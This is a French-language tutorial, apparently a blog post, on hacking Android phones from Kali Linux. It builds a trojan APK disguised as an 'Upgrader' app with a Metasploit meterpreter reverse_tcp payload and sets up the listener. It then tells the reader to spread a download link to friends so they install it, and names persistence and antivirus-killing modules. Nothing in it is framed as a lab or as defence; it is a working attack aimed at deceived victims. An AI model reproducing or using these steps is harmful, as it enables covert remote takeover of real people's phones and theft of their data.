
Pirater Android en utilisant Kali (à distance)
Ceci est un tutoriel expliquant comment pirater les téléphones Android avec Kali.
Je ne vois aucun tutoriel expliquant ce Hack , alors j’en ai fait un.
( Pourtant , vous le savez peut-être déjà )
Étape 1
Demarrer Kali Linux:
- Ouvrez un terminal et créez un cheval de Troie .apk
- Vous pouvez le faire en tapant:
- msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (remplacez LHOST par votre propre IP)
- Vous pouvez également pirater Android sur WAN c’est-à-dire via Interet en utilisant votre IP publique / externe dans le LHOST et par la redirection de port (demandez-moi sur la redirection de port si vous avez des problèmes dans la section commentaire)
Étape 2
Ouvrez un autre terminal:
- Ouvrez un autre terminal jusqu’à ce que le fichier soit produit.
- Chargez la console metasploit, en tapant: msfconsole
Étape 3
Configurer un auditeur:
- Après son chargement (cela prendra du temps), chargez l’exploit multi-gestionnaire en tapant: use exploit/multi/handler
- Configurez une charge utile (inverse) en tapant: set payload android/meterpreter/reverse_tcp
- Pour définir le type d’hôte L: définissez LHOST 192.168.0.4 (même si vous piratez sur le WAN, saisissez votre adresse IP privée / interne ici et non la publique / externe)
Étape 4
Exploit!
- Enfin tape: exploit pour démarrer l’ecouteur.
- Copiez l’application que vous avez créée (Upgrader.apk) à partir du dossier racine sur votre téléphone Android.
- Envoyez-le ensuite en le téléchargeant sur Dropbox ou sur un site Web de partage (comme: www.speedyshare.com ).
- Envoyez ensuite le lien que le site Web vous a donné à vos amis et exploitez leurs téléphones (uniquement sur LAN, mais si vous avez utilisé la méthode WAN, vous pouvez utiliser l’exploit n’importe où sur INTERNET)
- Laissez la victime installer l’application Upgrader (comme il pense qu’elle est destinée à mettre à niveau certaines fonctionnalités de son téléphone)
- Cependant , l’option d’autorisation pour l’installation d’applications à partir de sources inconnues doit être activée (sinon) à partir des paramètres de sécurité du téléphone Android pour permettre l’installation du cheval de Troie.
- Et quand il clique sur Ouvrir …
Étape 5
BOOM!
Il y a l’invite meterpreter:
—————————————— HACKED ——- ——————————————
Fin:
Continuez à venir pour plus!
Certains modules de publication qui fonctionnent pour Windows peuvent ne pas fonctionner dans Android
Par exemple: run killav, persistence (porte dérobée persistante), etc.
Merci!